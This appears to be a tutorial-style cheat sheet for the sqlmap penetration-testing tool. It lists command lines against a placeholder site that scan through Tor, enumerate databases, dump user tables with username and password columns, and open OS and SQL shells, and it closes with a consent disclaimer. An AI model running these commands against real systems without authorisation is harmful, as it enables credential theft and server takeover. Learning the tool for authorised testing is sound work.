SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.
What is SQLMAP ?
sqlmap is an open source penetration testing tool that automates the process of discovering and exploiting SQL injection vulnerabilities and taking over database servers. It comes with a powerful search engine, tons of niche features for the ultimate penetration tester, database fingerprinting, data extraction from databases, basic file system access, and a wide range of switches to run commands from the operating system. . Out-of-band connection.
How to Download SQLMAP?
You can download the latest zipball or tarball.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devEasy Scanning option
sqlmap -u "http://testsite.com/login.php"Scanning by using tor
sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5Scanning by manually setting the return time
sqlmap -u "http://testsite.com/login.php" --time-sec 15List all databases at the site
sqlmap -u "http://testsite.com/login.php" --dbsList all tables in a specific database
sqlmap -u "http://testsite.com/login.php" -D site_db --tablesDump the contents of a DB table
sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dumpList all columns in a table
sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columnsDump only selected columns
sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dumpDump a table from a database when you have admin credentials
sqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dumpGet OS Shell
sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shellGet SQL Shell
sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shellSqlmap tutorial step by step
Disclaimer
Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
